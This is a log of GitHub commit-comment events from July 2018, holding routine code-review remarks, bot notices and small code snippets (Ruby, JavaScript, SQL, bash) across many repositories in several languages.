{"id":"8039727286","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892475,"position":116,"line":116,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:16:09Z","updated_at":"2018-07-30T19:16:09Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-30T19:16:09Z"}
{"id":"8039727337","type":"CommitCommentEvent","actor":{"login":"RyanCrystal"},"repo":{"name":"RyanCrystal/simple_caculator"},"payload":{"comment":{"id":29892476,"position":null,"line":null,"path":null,"commit_id":"18dd94f56105b7c8b45531f8e40da189b1682c5c","created_at":"2018-07-30T19:16:10Z","updated_at":"2018-07-30T19:16:10Z","author_association":"OWNER","body":"first change"}},"created_at":"2018-07-30T19:16:10Z"}
{"id":"8039727484","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29892477,"position":null,"line":null,"path":null,"commit_id":"c82a12721ad26a5544e8bcb9ae4666ef9ad85e43","created_at":"2018-07-30T19:16:11Z","updated_at":"2018-07-30T19:16:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-167](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-167).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-167-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T19:16:11Z"}
{"id":"8039727589","type":"CommitCommentEvent","actor":{"login":"gamezcua1"},"repo":{"name":"jvazquez9802/LearningRedux"},"payload":{"comment":{"id":29892478,"position":5,"line":16,"path":"src/components/action.js","commit_id":"7bef1dcbea44c75d1bcecc97cce6adeaa15b89ba","created_at":"2018-07-30T19:16:12Z","updated_at":"2018-07-30T19:16:12Z","author_association":"NONE","body":"lo más hermoso del mundo "}},"created_at":"2018-07-30T19:16:12Z"}
{"id":"8039729969","type":"CommitCommentEvent","actor":{"login":"carymclaughlin"},"repo":{"name":"weaverjt/Fable-Farm"},"payload":{"comment":{"id":29892483,"position":null,"line":null,"path":null,"commit_id":"215f4a02f1015e4aaaeff9664886e079682036cd","created_at":"2018-07-30T19:16:37Z","updated_at":"2018-07-30T19:16:37Z","author_association":"COLLABORATOR","body":"api route maps"}},"created_at":"2018-07-30T19:16:37Z"}
{"id":"8039731408","type":"CommitCommentEvent","actor":{"login":"ijuma"},"repo":{"name":"apache/kafka"},"payload":{"comment":{"id":29892487,"position":null,"line":null,"path":null,"commit_id":"5bdbb596b647b51e4287296900c20526d3a1e5ef","created_at":"2018-07-30T19:16:54Z","updated_at":"2018-07-30T19:16:54Z","author_association":"CONTRIBUTOR","body":"To avoid confusion, note that this was never merged to any branch (it's just what GitHub does if you hit the \"revert\" button accidentally."}},"created_at":"2018-07-30T19:16:54Z"}
{"id":"8039735989","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892493,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:17:47Z","updated_at":"2018-07-30T19:17:47Z","author_association":"OWNER","body":"I'm following the same pattern as other helper functions."}},"created_at":"2018-07-30T19:17:47Z"}
{"id":"8039737867","type":"CommitCommentEvent","actor":{"login":"DianaSerra"},"repo":{"name":"DianaSerra/series-data-prototype"},"payload":{"comment":{"id":29892497,"position":43,"line":43,"path":"src/series/components/BatchImport.js","commit_id":"33b28c86be7bf7a8378761ed8e2d285bd85b22d2","created_at":"2018-07-30T19:18:09Z","updated_at":"2018-07-30T19:18:09Z","author_association":"OWNER","body":"Thanks! Do you think there's a better way to structure this though? I've been trying to put files in their respective 'files' array,  but since the files are nested in batches i can't just use setState directly so i haven't really found a simple-ish way to do it. "}},"created_at":"2018-07-30T19:18:09Z"}
{"id":"8039738764","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29892500,"position":27,"line":27,"path":"Lesson_6/lib/validation.rb","commit_id":"4b73b09716a02c155bba385b979daaa7e24aec14","created_at":"2018-07-30T19:18:19Z","updated_at":"2018-07-30T19:18:19Z","author_association":"NONE","body":"и сразу обрати внимание на следующий пункт ТЗ: \"Если введенные данные невалидные, то программа должна вывести сообщение о возникших ошибках и заново запросить данные у пользователя. Реализовать это через механизм обработки исключений\"\r\n\r\nмне кажется, что \"заново запросить данные\" не реализованно или реализованно неверно\r\nпосмотри еще раз в скринкасте, как это должно выглядеть при реализации \"через механизм обрабоки исключений\" "}},"created_at":"2018-07-30T19:18:19Z"}
{"id":"8039740952","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29892502,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-30T19:18:43Z","updated_at":"2018-07-30T19:18:43Z","author_association":"CONTRIBUTOR","body":"@p0deje I don't think we should be changing the file detector API in a minor release, although since it was pretty broken prior to the last release maybe it's ok -- really up to the committers/maintainers :)\r\n"}},"created_at":"2018-07-30T19:18:43Z"}
{"id":"8039741996","type":"CommitCommentEvent","actor":{"login":"rednoah"},"repo":{"name":"jlesage/docker-filebot"},"payload":{"comment":{"id":29892503,"position":23,"line":435,"path":"README.md","commit_id":"988e040dc1537f33677b6447acd3575e36fdad41","created_at":"2018-07-30T19:18:55Z","updated_at":"2018-07-30T19:18:55Z","author_association":"NONE","body":"`https://www.filebot.net/purchase.html` is better for user links here. The `#tar` is meant for links that FileBot opens itself, and will cause the checkout process to begin on page load."}},"created_at":"2018-07-30T19:18:55Z"}
{"id":"8039744289","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29892505,"position":null,"line":null,"path":null,"commit_id":"b9f8e55560467954277217ef44d699df02f305b9","created_at":"2018-07-30T19:19:19Z","updated_at":"2018-07-30T19:19:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-572](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-572).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-572-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-30T19:19:19Z"}
{"id":"8039749339","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29892510,"position":5,"line":12,"path":"railway_road/train.rb","commit_id":"78c928dc6f0c2dd97bd0ea4b64adba16bf86b6bc","created_at":"2018-07-30T19:20:17Z","updated_at":"2018-07-30T19:20:17Z","author_association":"NONE","body":"Дело в том, что модуль instance_counter должен сам создавать переменную, а не использовать уже созданную внутри класса. Нужно переделать (текущую @@instances переименуй например в @@trains) "}},"created_at":"2018-07-30T19:20:17Z"}
{"id":"8039774756","type":"CommitCommentEvent","actor":{"login":"zlumer"},"repo":{"name":"DucaturFw/ducor-backend"},"payload":{"comment":{"id":29892560,"position":5,"line":10,"path":"package.json","commit_id":"0970d977e0439b885ae13405caa2f4cb03578a60","created_at":"2018-07-30T19:24:56Z","updated_at":"2018-07-30T19:24:56Z","author_association":"MEMBER","body":"Lol private keys"}},"created_at":"2018-07-30T19:24:56Z"}
{"id":"8039776154","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"SilverKZ/rubytut"},"payload":{"comment":{"id":29892565,"position":25,"line":29,"path":"lesson4/train.rb","commit_id":"eff5501042685a2d893f35f600ad14ed1c1f05c9","created_at":"2018-07-30T19:25:13Z","updated_at":"2018-07-30T19:25:13Z","author_association":"NONE","body":"@@all_train лучше сделать хэшем с ключом в виде номера поезда, тогда поиск будет просто выбор значения по ключу, это будет значительно быстрее"}},"created_at":"2018-07-30T19:25:13Z"}
{"id":"8039777448","type":"CommitCommentEvent","actor":{"login":"lundjordan"},"repo":{"name":"Akhliskun/build-puppet"},"payload":{"comment":{"id":29892568,"position":null,"line":null,"path":null,"commit_id":"028f200fe403bdb6c904a6d68cda27a7c3da90bc","created_at":"2018-07-30T19:25:28Z","updated_at":"2018-07-30T19:25:28Z","author_association":"NONE","body":"sure. wfm"}},"created_at":"2018-07-30T19:25:28Z"}
{"id":"8039779032","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892571,"position":33,"line":33,"path":"microservices/product-search/src/Repository/ProductSearchRepository.php","commit_id":"8b1b08573047fffe7c3c2b20fad3eb52931c8755","created_at":"2018-07-30T19:25:46Z","updated_at":"2018-07-30T19:25:46Z","author_association":"NONE","body":"Tohle už jsem říkal, ale není nějaký způsob jak ty SQL držet alespoň jako kód odděleně, Mícháme tady 2 světy... Zjednoduší to potencionální refactoring, co když budete chtít vyměnit persistentní technologii? Jen přemýšlím nahlas:-)"}},"created_at":"2018-07-30T19:25:46Z"}
{"id":"8039781087","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892573,"position":33,"line":33,"path":"microservices/product-search/src/Repository/ProductSearchRepository.php","commit_id":"8b1b08573047fffe7c3c2b20fad3eb52931c8755","created_at":"2018-07-30T19:26:11Z","updated_at":"2018-07-30T19:26:11Z","author_association":"NONE","body":"Možná ještě nebylo by lepší to mít jako procedůru, přijímající parametry?"}},"created_at":"2018-07-30T19:26:11Z"}
{"id":"8039782691","type":"CommitCommentEvent","actor":{"login":"mchamberland"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":29892577,"position":null,"line":null,"path":null,"commit_id":"9d5ec23966d6c5c07632921a13d09feafd831374","created_at":"2018-07-30T19:26:28Z","updated_at":"2018-07-30T19:26:28Z","author_association":"CONTRIBUTOR","body":"Just wondering what's the reason for the following: \"both files contain the same density-effect\r\ncorrection data, calculated for 2.265 g/cm3\"?\r\n\r\nWhy not calculate a density-effect correction for the 1.7 g/cm3 density value? Is it just that the differences are negligible?"}},"created_at":"2018-07-30T19:26:28Z"}
{"id":"8039789794","type":"CommitCommentEvent","actor":{"login":"KazuGod"},"repo":{"name":"DaAmazingShit/BetacraftPlugin"},"payload":{"comment":{"id":29892591,"position":null,"line":null,"path":null,"commit_id":"0c0fa54fc7a42c38b1866086dd81d0f52e987413","created_at":"2018-07-30T19:27:52Z","updated_at":"2018-07-30T19:27:52Z","author_association":"COLLABORATOR","body":"Added CobbleX."}},"created_at":"2018-07-30T19:27:52Z"}
{"id":"8039795986","type":"CommitCommentEvent","actor":{"login":"ArminTaheri"},"repo":{"name":"DianaSerra/series-data-prototype"},"payload":{"comment":{"id":29892600,"position":43,"line":43,"path":"src/series/components/BatchImport.js","commit_id":"33b28c86be7bf7a8378761ed8e2d285bd85b22d2","created_at":"2018-07-30T19:29:03Z","updated_at":"2018-07-30T19:29:03Z","author_association":"NONE","body":"the Ramda library has a way to apply focus into a nested object and run a function in the focused data\r\n\r\n```\r\n...\r\naddFileToBatch(index, file) {\r\n  const { batches } = this.state;\r\n  const innerArrayLens = R.lensPath([index, \"files\"])\r\n  this.setState({ batches: R.over(innerArrayLens,  R.append(file), batches })\r\n}\r\n...\r\n```\r\n\r\n`R.lensPath` takes a path of keys and returns a `lens` that we can use to update a nested object with a function\r\n\r\n`R.over` takes a lens, an update function, and the nested structure and returns a new nested structure with changes where the lens is pointing\r\n\r\n`R.append` is partially applied so we can use it as an \"update function\" for some nested key\r\n"}},"created_at":"2018-07-30T19:29:03Z"}
{"id":"8039796132","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29892601,"position":null,"line":null,"path":null,"commit_id":"377785e6b9a5142ac8b4ad6e33c55862dad1c9c9","created_at":"2018-07-30T19:29:04Z","updated_at":"2018-07-30T19:29:04Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T19:29:04Z"}
{"id":"8039800291","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"nodogsplash/nodogsplash"},"payload":{"comment":{"id":29892609,"position":null,"line":null,"path":null,"commit_id":"a988b9be09180e9707ebb0d82d5931190e56a36a","created_at":"2018-07-30T19:29:49Z","updated_at":"2018-07-30T19:29:49Z","author_association":"MEMBER","body":"Is the `&` => `&amp;` necessary? Also, the redirect_url_encoded variable can be removed now."}},"created_at":"2018-07-30T19:29:49Z"}
{"id":"8039808445","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892625,"position":28,"line":36,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:31:26Z","updated_at":"2018-07-30T19:31:26Z","author_association":"NONE","body":"в руби так методы не вызывают )) это же не `JS` ))\r\nесли аргументов нет, то просто `open`\r\nну и далее по коду везде это нужно поправить "}},"created_at":"2018-07-30T19:31:26Z"}
{"id":"8039811026","type":"CommitCommentEvent","actor":{"login":"Mark90"},"repo":{"name":"Attumm/redis-dict"},"payload":{"comment":{"id":29892631,"position":155,"line":123,"path":"redis_dict.py","commit_id":"002d7e0964fbf47f1b2f28df4faf6c0c8bee7855","created_at":"2018-07-30T19:31:55Z","updated_at":"2018-07-30T19:31:55Z","author_association":"CONTRIBUTOR","body":"This seems to return only values instead of items"}},"created_at":"2018-07-30T19:31:55Z"}
{"id":"8039814007","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892640,"position":34,"line":31,"path":"packages/framework/src/Component/Microservice/MicroserviceClient.php","commit_id":"9c213657b2e0eb7153e0ef6818787b42984f45cd","created_at":"2018-07-30T19:32:31Z","updated_at":"2018-07-30T19:32:31Z","author_association":"NONE","body":"Makes sense"}},"created_at":"2018-07-30T19:32:31Z"}
{"id":"8039816546","type":"CommitCommentEvent","actor":{"login":"Mark90"},"repo":{"name":"Attumm/redis-dict"},"payload":{"comment":{"id":29892643,"position":157,"line":125,"path":"redis_dict.py","commit_id":"002d7e0964fbf47f1b2f28df4faf6c0c8bee7855","created_at":"2018-07-30T19:33:01Z","updated_at":"2018-07-30T19:33:01Z","author_association":"CONTRIBUTOR","body":"Should we consider Py2/Py3 cross-compatibility, or make a separate version for Py3 so both can be supported whilst keeping the code clean?"}},"created_at":"2018-07-30T19:33:01Z"}
{"id":"8039818615","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892648,"position":13,"line":22,"path":"card.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:33:25Z","updated_at":"2018-07-30T19:33:25Z","author_association":"NONE","body":"лучше все же не использовать здесь однобуквенную переменную"}},"created_at":"2018-07-30T19:33:25Z"}
{"id":"8039821563","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892650,"position":4,"line":9,"path":"packages/framework/src/Component/Microservice/MicroserviceClient.php","commit_id":"9c213657b2e0eb7153e0ef6818787b42984f45cd","created_at":"2018-07-30T19:33:59Z","updated_at":"2018-07-30T19:33:59Z","author_association":"NONE","body":"Možná zbytečně konstantou, budeme tato využívána na více místech? Pokud ano, pak není zbytečně pokud ne pak je:-)"}},"created_at":"2018-07-30T19:33:59Z"}
{"id":"8039822163","type":"CommitCommentEvent","actor":{"login":"Jorys-Paulin"},"repo":{"name":"moonlight-stream/moonlight-stream.github.io"},"payload":{"comment":{"id":29892651,"position":null,"line":null,"path":null,"commit_id":"80e622510188a0d8791f764328893cdde845d0c4","created_at":"2018-07-30T19:34:07Z","updated_at":"2018-07-30T19:34:07Z","author_association":"CONTRIBUTOR","body":"Thinking about it, it would have been smarter to put it into an `assets` directory and to make sure you have a fallback just in case it gets deleted."}},"created_at":"2018-07-30T19:34:07Z"}
{"id":"8039827003","type":"CommitCommentEvent","actor":{"login":"BmGuerrero"},"repo":{"name":"BmGuerrero/SQL-source-code"},"payload":{"comment":{"id":29892659,"position":null,"line":null,"path":null,"commit_id":"4dbe93c3050e2bcf29a426b932bba837c0f2833b","created_at":"2018-07-30T19:35:08Z","updated_at":"2018-07-30T19:35:08Z","author_association":"OWNER","body":"Number of Orders: \r\n\r\n\r\nSELECT employeeiD, firstname, lastname, COUNT(sales) AS Number_of_Orders\r\nFROM\r\n        (Select *,unitprice*quantity*(1-discount) as sales\r\n        FROM Employees e\r\n        JOIN orders o \r\n        ON e.employeeID = o.employeeID\r\n        JOIN OrderDetails od\r\n        ON od.orderID = o.orderID\r\n        JOIN employeeterritories et\r\n        ON et.employeeID = e.employeeID\r\n        ) sub\r\n        \r\ngroup by 1,2,3\r\nORDER BY 4 DESC\r\n\r\n\r\nSmallest Order: \r\n\r\n\r\nSELECT employeeiD, firstname, lastname, MIN(sales) AS Smallest_Order\r\nFROM\r\n        (Select *,unitprice*quantity*(1-discount) as sales\r\n        FROM Employees e\r\n        JOIN orders o \r\n        ON e.employeeID = o.employeeID\r\n        JOIN OrderDetails od\r\n        ON od.orderID = o.orderID\r\n        JOIN employeeterritories et\r\n        ON et.employeeID = e.employeeID\r\n        ) sub\r\n        \r\ngroup by 1,2,3\r\nORDER BY 4 DESC\r\n\r\n\r\n\r\nLargest Order: \r\n\r\nSELECT employeeiD, firstname, lastname, MAX(sales) AS Largest_Order\r\nFROM\r\n        (Select *,unitprice*quantity*(1-discount) as sales\r\n        FROM Employees e\r\n        JOIN orders o \r\n        ON e.employeeID = o.employeeID\r\n        JOIN OrderDetails od\r\n        ON od.orderID = o.orderID\r\n        JOIN employeeterritories et\r\n        ON et.employeeID = e.employeeID\r\n        ) sub        \r\ngroup by 1,2,3\r\nORDER BY 4 DESC\r\n\r\n\r\nTotal Orders:\r\nSELECT employeeiD, firstname, lastname, SUM(sales) as Total_Orders\r\nFROM\r\n        (Select *,unitprice*quantity*(1-discount) as sales\r\n        FROM Employees e\r\n        JOIN orders o \r\n        ON e.employeeID = o.employeeID\r\n        JOIN OrderDetails od\r\n        ON od.orderID = o.orderID\r\n        JOIN employeeterritories et\r\n        ON et.employeeID = e.employeeID\r\n        ) sub\r\ngroup by 1,2,3\r\norder by 4 DESC\r\n\r\n\r\nAverage Order Size: \r\n\r\nSELECT employeeiD, firstname, lastname, AVG(sales) AS AVG_Order_Size\r\nFROM\r\n        (Select *,unitprice*quantity*(1-discount) as sales\r\n        FROM Employees e\r\n        JOIN orders o \r\n        ON e.employeeID = o.employeeID\r\n        JOIN OrderDetails od\r\n        ON od.orderID = o.orderID\r\n        JOIN employeeterritories et\r\n        ON et.employeeID = e.employeeID\r\n        ) sub\r\n        \r\ngroup by 1,2,3\r\nORDER BY 4 DESC"}},"created_at":"2018-07-30T19:35:08Z"}
{"id":"8039830759","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29892664,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T19:35:53Z","updated_at":"2018-07-30T19:35:53Z","author_association":"OWNER","body":"It sure is.\r\n\r\nI maintain my view that these gcc warnings are crap and most of these changes were bad (I wonder how many more problems you introduced here and in later commits?). What we should have done was add compiler flags to stop gcc from being a fucktard."}},"created_at":"2018-07-30T19:35:53Z"}
{"id":"8039832997","type":"CommitCommentEvent","actor":{"login":"muxator"},"repo":{"name":"ether/etherpad-lite"},"payload":{"comment":{"id":29892668,"position":null,"line":null,"path":null,"commit_id":"a3ae374a67f898905e4ce12f5f92a02474f6b73a","created_at":"2018-07-30T19:36:20Z","updated_at":"2018-07-30T19:36:20Z","author_association":"CONTRIBUTOR","body":"Thanks @zorrikon. I have no mac at hand (trying to find a free Virtualbox image, but it's not straight). In the meantime, could you please try to replace long options with short ones and see if it solves the specific issue?\r\n\r\n```bash\r\nDETECTED_MAJOR=$(echo $VERSION_STRING | cut -s -d \".\" -f 1)\r\nDETECTED_MINOR=$(echo $VERSION_STRING | cut -s -d \".\" -f 2)\r\n```\r\n\r\nThe experiment would be successful if the script would exit complaining of a too old `nodejs` or `npm` version (inferring from what I see from your report).\r\n\r\nThank you.\r\n"}},"created_at":"2018-07-30T19:36:20Z"}
{"id":"8039834308","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892673,"position":13,"line":22,"path":"card.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:36:37Z","updated_at":"2018-07-30T19:36:37Z","author_association":"NONE","body":"не очень очевидные вычисления, основанные на свойстве метода `to_i`\r\nлучше явно проверять категорию карты... ну через `include?` к примеру\r\nкак-то так же, как в 15 строке - все четко и сразу читается"}},"created_at":"2018-07-30T19:36:37Z"}
{"id":"8039836589","type":"CommitCommentEvent","actor":{"login":"mqudsi"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29892678,"position":null,"line":null,"path":null,"commit_id":"3561f36cc493247603e20fd01b9fb1720dc3a517","created_at":"2018-07-30T19:37:06Z","updated_at":"2018-07-30T19:37:06Z","author_association":"CONTRIBUTOR","body":"@zanchey did you purposely drop the list of completion improvements?"}},"created_at":"2018-07-30T19:37:06Z"}
{"id":"8039836667","type":"CommitCommentEvent","actor":{"login":"tomtomjhj"},"repo":{"name":"hagsfdf/web"},"payload":{"comment":{"id":29892679,"position":2,"line":11,"path":"1.html","commit_id":"95306725a5010bd40538fe415342c2c5aa507fda","created_at":"2018-07-30T19:37:07Z","updated_at":"2018-07-30T19:37:07Z","author_association":"NONE","body":"no"}},"created_at":"2018-07-30T19:37:07Z"}
{"id":"8039837531","type":"CommitCommentEvent","actor":{"login":"dvdcastro"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29892681,"position":null,"line":null,"path":null,"commit_id":"8c52eb2a152eff8375424447f1232cd147e13e48","created_at":"2018-07-30T19:37:17Z","updated_at":"2018-07-30T19:37:17Z","author_association":"CONTRIBUTOR","body":"I think the capability is called `'moodle/course: setforcedlanguage'`."}},"created_at":"2018-07-30T19:37:17Z"}
{"id":"8039839198","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892685,"position":1,"line":10,"path":"microservices/product-search/composer.json","commit_id":"9a8a30bce5a28b4114d847d8381972f287d059fc","created_at":"2018-07-30T19:37:37Z","updated_at":"2018-07-30T19:37:37Z","author_association":"NONE","body":"Krom logingu bych doporučil i nějaký nástroj na error tracing, jednoduše mít jeden single point of collection pro errory ... Velmi praktické, jakmile vám těch microservice bude přibývat\r\nVíce zde, https://sentry.io/welcome/ klienti jsou pro laravel i Symphony: https://docs.sentry.io/clients/php/"}},"created_at":"2018-07-30T19:37:37Z"}
{"id":"8039840285","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892691,"position":1,"line":10,"path":"microservices/product-search/composer.json","commit_id":"9a8a30bce5a28b4114d847d8381972f287d059fc","created_at":"2018-07-30T19:37:50Z","updated_at":"2018-07-30T19:37:50Z","author_association":"NONE","body":"S instalací a setupem můžu pomoct:-)"}},"created_at":"2018-07-30T19:37:50Z"}
{"id":"8039840357","type":"CommitCommentEvent","actor":{"login":"fkorotkov"},"repo":{"name":"cirruslabs/cirrus-ci-docs"},"payload":{"comment":{"id":29892692,"position":23,"line":39,"path":"docs/guide/windows.md","commit_id":"cfa5c8869a701614a96649cc2aa2288b0108adeb","created_at":"2018-07-30T19:37:51Z","updated_at":"2018-07-30T19:37:51Z","author_association":"CONTRIBUTOR","body":"whoops 😅 Fixed in dd8bbd41026577c6b44dc2abfa5aa1f3650462e1"}},"created_at":"2018-07-30T19:37:51Z"}
{"id":"8039840625","type":"CommitCommentEvent","actor":{"login":"gdevenyi"},"repo":{"name":"ANTsX/ANTs"},"payload":{"comment":{"id":29892693,"position":null,"line":null,"path":null,"commit_id":"b872ef3bd154998377c100fa75788140fc491a39","created_at":"2018-07-30T19:37:54Z","updated_at":"2018-07-30T19:37:54Z","author_association":"CONTRIBUTOR","body":"Hurrah! Finally! No more not enough voxels complaints!\r\n\r\nHave you kept an eye on http://review.source.kitware.com/#/c/23600/ ?"}},"created_at":"2018-07-30T19:37:54Z"}
{"id":"8039842719","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29892695,"position":null,"line":null,"path":null,"commit_id":"fbd79ead6198bc950d586b6007642af1da1c478f","created_at":"2018-07-30T19:38:21Z","updated_at":"2018-07-30T19:38:21Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-57](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-57).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-57-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-30T19:38:21Z"}
{"id":"8039843207","type":"CommitCommentEvent","actor":{"login":"orlandocaraballo"},"repo":{"name":"orlandocaraballo/-new-repository"},"payload":{"comment":{"id":29892697,"position":7,"line":6,"path":"index.html","commit_id":"321b4e9c0409f1cd09c16caa91dd694758bad963","created_at":"2018-07-30T19:38:27Z","updated_at":"2018-07-30T19:38:27Z","author_association":"OWNER","body":"This looks dope af."}},"created_at":"2018-07-30T19:38:27Z"}
{"id":"8039843452","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29892698,"position":null,"line":null,"path":null,"commit_id":"3ffd54eef80121779e25b431d4979d2be455f095","created_at":"2018-07-30T19:38:30Z","updated_at":"2018-07-30T19:38:30Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-575](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-575).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-575-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-30T19:38:30Z"}
{"id":"8039844943","type":"CommitCommentEvent","actor":{"login":"fredbuluku"},"repo":{"name":"ethereum/mist"},"payload":{"comment":{"id":29892701,"position":null,"line":null,"path":null,"commit_id":"da40caac945d2da7659bdbe3ca46284a1825ac9c","created_at":"2018-07-30T19:38:48Z","updated_at":"2018-07-30T19:38:48Z","author_association":"NONE","body":"> thanks ever for your support "}},"created_at":"2018-07-30T19:38:48Z"}
{"id":"8039850030","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29892710,"position":null,"line":null,"path":null,"commit_id":"c82a12721ad26a5544e8bcb9ae4666ef9ad85e43","created_at":"2018-07-30T19:39:49Z","updated_at":"2018-07-30T19:39:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-167](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-167).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-167-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T19:39:49Z"}
{"id":"8039854733","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892716,"position":5,"line":4,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:40:45Z","updated_at":"2018-07-30T19:40:45Z","author_association":"NONE","body":"все методы кроме \"старт\" видимо стоит поместить в приват"}},"created_at":"2018-07-30T19:40:45Z"}
{"id":"8039858376","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892721,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/cargo_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:41:28Z","updated_at":"2018-07-30T19:41:28Z","author_association":"NONE","body":"general - это не самое лучшее название для переменной. general с английского переводится как \"общее\". Тут у тебя скорее объем, а объем будет volume."}},"created_at":"2018-07-30T19:41:28Z"}
